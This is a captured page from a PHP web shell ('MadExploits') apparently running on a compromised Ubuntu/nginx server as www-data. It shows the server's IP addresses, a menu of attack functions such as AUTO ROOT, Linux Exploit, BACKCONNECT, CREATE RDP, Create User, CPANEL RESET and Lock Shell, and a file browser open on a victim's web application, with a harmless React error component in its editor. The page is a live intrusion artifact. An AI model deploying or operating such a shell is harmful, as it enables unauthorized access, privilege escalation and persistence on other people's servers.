Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
ui /
error /
[ HOME SHELL ]
Name
Size
Permission
Action
messages.ts
404
B
-rw-rw-r--
showClientSideErrors.tsx
808
B
-rw-rw-r--
showErrors.tsx
1008
B
-rw-rw-r--
validate.tsx
1.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : showClientSideErrors.tsx
import * as React from 'react'; import { checkErrors } from './validate'; interface ErrorsProps { value: any; validations: any; display: boolean; } class ShowErrors extends React.Component<ErrorsProps, {}> { static defaultProps = { display: false, }; listOfErrors() { const { validations, value } = this.props; const errors = checkErrors(value, validations); return errors; } render() { if (!this.props.display) { return null; } return ( <div> {this.listOfErrors().map(err => ( <p style={{ color: 'red' }} key={err}> {err} </p> ))} </div> ); } } export default ShowErrors;
Close